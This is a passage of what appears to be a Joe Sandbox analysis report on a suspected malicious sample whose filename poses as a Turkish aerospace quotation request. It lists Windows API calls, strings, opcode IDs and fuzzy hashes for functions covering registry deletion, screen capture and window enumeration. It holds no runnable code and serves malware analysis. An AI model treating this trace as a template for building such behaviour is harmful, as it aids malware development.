                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                                                    • Opcode ID: 0a978235e6295f0901362e30123ac5ec81cd5a720948f03ccc5c11068231c12f
                                                                                                                                    • Instruction ID: 9cb525bc52b43a8dad2b85dc8f14fecfa4023daed9f22e43f2848abfa881eab9
                                                                                                                                    • Opcode Fuzzy Hash: 0a978235e6295f0901362e30123ac5ec81cd5a720948f03ccc5c11068231c12f
                                                                                                                                    • Instruction Fuzzy Hash: 88D12531A00119FBDF08AF65E885BBDB7B6BF46700F25805AF606AB190DB30DD45DBA1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020B6F4
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020B772
                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0020B80A
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0020B87E
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0020B89C
                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0020B8F2
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0020B904
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0020B922
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0020B983
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0020B994
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                    • Opcode ID: d4c35134d33d42daafd89b73eebea1e50a039801430607d4d032b7d573a4a8ba
                                                                                                                                    • Instruction ID: dfdf8eeb91e4c735b6d8626a672ec3fef6ed1df093a590e21f1fc29df42d9f9d
                                                                                                                                    • Opcode Fuzzy Hash: d4c35134d33d42daafd89b73eebea1e50a039801430607d4d032b7d573a4a8ba
                                                                                                                                    • Instruction Fuzzy Hash: C7C18A35218302AFD725DF14C494F2ABBE5BF94308F14849CE59A8B2A3CB71E955CF91
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 002025D8
                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002025E8
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 002025F4
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00202601
                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0020266D
                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002026AC
                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002026D0
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002026D8
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002026E1
                                                                                                                                    • DeleteDC.GDI32(?), ref: 002026E8
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 002026F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                    • Opcode ID: 17ddfc7c7c4ab80911fe94317fe62c22ef78c3016b60fb39c4e2e561fa65af8e
                                                                                                                                    • Instruction ID: b5e10b7f2ede09df46fb34f2ac0af6ea5f6767728dcfa43a6569eb74490df0b2
                                                                                                                                    • Opcode Fuzzy Hash: 17ddfc7c7c4ab80911fe94317fe62c22ef78c3016b60fb39c4e2e561fa65af8e
                                                                                                                                    • Instruction Fuzzy Hash: 5C610275D00219EFCF04CFA4D888AAEBBFAFF58310F20852AE959A7251D771A951CF50
                                                                                                                                    APIs
                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 001BDAA1
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD659
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD66B
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD67D
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD68F
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6A1
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6B3
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6C5
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6D7
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6E9
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6FB
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD70D
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD71F
                                                                                                                                      • Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD731
                                                                                                                                    • _free.LIBCMT ref: 001BDA96
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001BDAB8
                                                                                                                                    • _free.LIBCMT ref: 001BDACD
                                                                                                                                    • _free.LIBCMT ref: 001BDAD8
                                                                                                                                    • _free.LIBCMT ref: 001BDAFA
                                                                                                                                    • _free.LIBCMT ref: 001BDB0D
                                                                                                                                    • _free.LIBCMT ref: 001BDB1B
                                                                                                                                    • _free.LIBCMT ref: 001BDB26
                                                                                                                                    • _free.LIBCMT ref: 001BDB5E
                                                                                                                                    • _free.LIBCMT ref: 001BDB65
                                                                                                                                    • _free.LIBCMT ref: 001BDB82
                                                                                                                                    • _free.LIBCMT ref: 001BDB9A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                    • Opcode ID: 2506890613cefe0fd7e86e2b32bfddb77c3ff535229fe89bbfdfd801576766d7
                                                                                                                                    • Instruction ID: 61aa21f5c36768ca324d30c463d2f5b4b14fa69f3eec5e8602c4c412e200d1e3
                                                                                                                                    • Opcode Fuzzy Hash: 2506890613cefe0fd7e86e2b32bfddb77c3ff535229fe89bbfdfd801576766d7
                                                                                                                                    • Instruction Fuzzy Hash: 8C315C31604305AFEB29AA39E945BDAB7E9FF21314F154829F449D7191EF31EC44CB24
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001E369C
                                                                                                                                    • _wcslen.LIBCMT ref: 001E36A7
                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001E3797
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001E380C
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 001E385D
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001E3882
                                                                                                                                    • GetParent.USER32(?), ref: 001E38A0
                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 001E38A7
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001E3921
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001E395D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                    • String ID: %s%u
                                                                                                                                    • API String ID: 4010501982-679674701
                                                                                                                                    • Opcode ID: 6688c4a8ad8f8dacd3bcccc3dd3866575003948f436718e2d586da6ad3d2dc06
                                                                                                                                    • Instruction ID: e4c273642f67ce6e1655dfa12f2e568dce20ce5d111263bdf660edb1596b2555
                                                                                                                                    • Opcode Fuzzy Hash: 6688c4a8ad8f8dacd3bcccc3dd3866575003948f436718e2d586da6ad3d2dc06
                                                                                                                                    • Instruction Fuzzy Hash: 3391A271204A46AFD718DF25C889FEEF7A8FF54314F008629F9A983191DB30AA45CB91
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001E4994
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001E49DA
                                                                                                                                    • _wcslen.LIBCMT ref: 001E49EB
                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 001E49F7
                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001E4A2C
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001E4A64
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001E4A9D
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001E4AE6
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001E4B20
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001E4B8B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                    • Opcode ID: 4597c66e7a22a321adfa7b8c4269c956180b050233ff4be0a4adeeddda41db49
                                                                                                                                    • Instruction ID: 1cdf42723799dc37f6ee4cf9ef1b29f07e75ecb39ed679fcdcad12d5bc0ada0d
                                                                                                                                    • Opcode Fuzzy Hash: 4597c66e7a22a321adfa7b8c4269c956180b050233ff4be0a4adeeddda41db49
                                                                                                                                    • Instruction Fuzzy Hash: A591DD310086859FDB04CF16D985BAEB7E9FF94314F04846AFD869B096DB30ED45CBA1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00218D5A
                                                                                                                                    • GetFocus.USER32 ref: 00218D6A
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00218D75
                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00218E1D
                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00218ECF
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00218EEC
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00218EFC
                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00218F2E
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00218F70
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00218FA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                    • Opcode ID: fb1ece1f6529b26449e14feb80e437a25efa45d38ca15e2b3d66a218c12e457f
                                                                                                                                    • Instruction ID: f28f714ebbe46dd1c4f80de6b0862eab5177ef6c67f5637d1f75b087e1b56934
                                                                                                                                    • Opcode Fuzzy Hash: fb1ece1f6529b26449e14feb80e437a25efa45d38ca15e2b3d66a218c12e457f
                                                                                                                                    • Instruction Fuzzy Hash: 1D81A071514302AFDB10CF24D8C8AEB7BEAFBA8354F14051DF98597291DB70D991CBA2
                                                                                                                                    APIs
                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001EDC20
                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001EDC46
                                                                                                                                    • _wcslen.LIBCMT ref: 001EDC50
                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001EDCA0
                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001EDCBC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                                                    • Opcode ID: b4eac9969686d9e84e50602b62062596c4dde62245d4f0943ef8b13da39323ed
                                                                                                                                    • Instruction ID: 660b565c92ed94763a08707cd3863e09dbebf391b7fb53d66a69092241cf6d2d
                                                                                                                                    • Opcode Fuzzy Hash: b4eac9969686d9e84e50602b62062596c4dde62245d4f0943ef8b13da39323ed
                                                                                                                                    • Instruction Fuzzy Hash: F741247AA406107BDB04A7B5AC07EFF77ACEF67750F240069F900E61C2EB709A1187A5
                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0020CC64
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0020CC8D
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0020CD48
                                                                                                                                      • Part of subcall function 0020CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0020CCAA
                                                                                                                                      • Part of subcall function 0020CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0020CCBD
                                                                                                                                      • Part of subcall function 0020CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0020CCCF
                                                                                                                                      • Part of subcall function 0020CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0020CD05
                                                                                                                                      • Part of subcall function 0020CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0020CD28
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0020CCF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                    • Opcode ID: a082f4c34795c102f1460a14b58897e0a2831aabe1f144b085338d82051c4adb
                                                                                                                                    • Instruction ID: e968816da0e5970a7c1892cff2e1ffdcd67bc59525cbbafdb3a897bbf81eeaa7
                                                                                                                                    • Opcode Fuzzy Hash: a082f4c34795c102f1460a14b58897e0a2831aabe1f144b085338d82051c4adb
                                                                                                                                    • Instruction Fuzzy Hash: C231AFB5951229BBDB208F50DC8CEFFBB7CEF15750F204265B905E2281DB308E45DAA0
                                                                                                                                    APIs
                                                                                                                                    • timeGetTime.WINMM ref: 001EE6B4
                                                                                                                                      • Part of subcall function 0019E551: timeGetTime.WINMM(?,?,001EE6D4), ref: 0019E555
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 001EE6E1
                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001EE705
                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001EE727
                                                                                                                                    • SetActiveWindow.USER32 ref: 001EE746
                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001EE754
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 001EE773
                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 001EE77E
                                                                                                                                    • IsWindow.USER32 ref: 001EE78A
                                                                                                                                    • EndDialog.USER32(00000000), ref: 001EE79B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                    • String ID: BUTTON
                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                    • Opcode ID: be63f1a29b9479cd2bcd6290a7230f9abc3bc86409e7548a4a1095cb68b4e5eb
                                                                                                                                    • Instruction ID: 64e3632bd80e1c813eae80f24ab61fcbed4a6da2b3ae3fb3fddd2cbcb645304f
                                                                                                                                    • Opcode Fuzzy Hash: be63f1a29b9479cd2bcd6290a7230f9abc3bc86409e7548a4a1095cb68b4e5eb
                                                                                                                                    • Instruction Fuzzy Hash: AB21C3B4640B85FFEB005F61FC8DB693BADF76534AF204424F815C21A1DF71AC448A68
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001EEA5D
                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001EEA73
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EEA84
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001EEA96
                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001EEAA7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                    • Opcode ID: 7cb88aa0c86d1244436621bb2274c0e3d446baa8557345cdc1d3ad56c6a58d32
                                                                                                                                    • Instruction ID: 3b5ce5f17a4e1c52966da26f40eacff89c61fd77a03a1d6d596393bf4a08f00d
                                                                                                                                    • Opcode Fuzzy Hash: 7cb88aa0c86d1244436621bb2274c0e3d446baa8557345cdc1d3ad56c6a58d32
                                                                                                                                    • Instruction Fuzzy Hash: 28117731AA025979D724B762DC4EDFF6ABCEBD3F04F440429B811A20D1EFB00A15CAB1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00198F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00198BE8,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198FC5
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00198C81
